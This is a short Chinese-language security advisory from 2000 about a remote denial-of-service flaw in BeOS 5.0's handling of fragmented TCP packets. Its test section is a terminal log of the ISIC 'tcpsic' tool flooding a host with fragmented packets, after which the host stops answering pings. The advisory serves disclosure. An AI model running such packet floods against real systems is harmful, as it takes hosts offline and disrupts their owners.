BeOS TCP Fragmentation 存在远程DOS漏洞发布时间:2000-05-15 更新时间:2000-05-15 严重程度:中 威胁程度:远程拒绝服务 错误类型:设计错误 利用方式:服务器模式 受影响系统 Be BeOS 5.0详细描述 Be/OS 5.0在tcp分段处理机制上存在问题,攻击者可以发送特殊格式的ip包,使 Be/OS系统锁死,必须冷启动才能回复系统正常工作。 测试代码 [root@localhost isic-0.05]# ping 10.0.1.46 PING 10.0.1.46 (10.0.1.46) from 10.0.3.5 : 56(84) bytes of data. 64 bytes from 10.0.1.46: icmp_seq=0 ttl=255 time=7.3 ms 64 bytes from 10.0.1.46: icmp_seq=1 ttl=255 time=1.8 ms --- 10.0.1.46 ping statistics --- 2 packets transmitted, 2 packets received, 0% packet loss round-trip min/avg/max = 1.8/4.5/7.3 ms [root@localhost isic-0.05]# ./tcpsic -s 1.1.1.1 -d 10.0.1.46 -r 31337 -F100 -V0 -I0 -T0 -u0 -t0 Compiled against Libnet 1.0.1b Installing Signal Handlers. Seeding with 31337 No Maximum traffic limiter Using random source ports. Using random destination ports. Bad IP Version = 0% IP Opts Pcnt = 0% Frag'd Pcnt = 100% Urg Pcnt = 0% Bad TCP Cksm = 0% TCP Opts Pcnt = 0% 1000 @ 1802.8 pkts/sec and 1174.6 k/s 2000 @ 1636.8 pkts/sec and 1105.5 k/s 3000 @ 2110.2 pkts/sec and 1396.4 k/s 4000 @ 1689.1 pkts/sec and 1105.4 k/s Caught signal 2 Used random seed 31337 Wrote 5002 packets in 2.74s @ 1824.48 pkts/s [root@localhost isic-0.05]# ping 10.0.1.46 PING 10.0.1.46 (10.0.1.46) from 10.0.3.5 : 56(84) bytes of data. --- 10.0.1.46 ping statistics --- 11 packets transmitted, 0 packets received, 100% packet loss [root@localhost isic-0.05]# 解决方案 尚无 相关信息 |
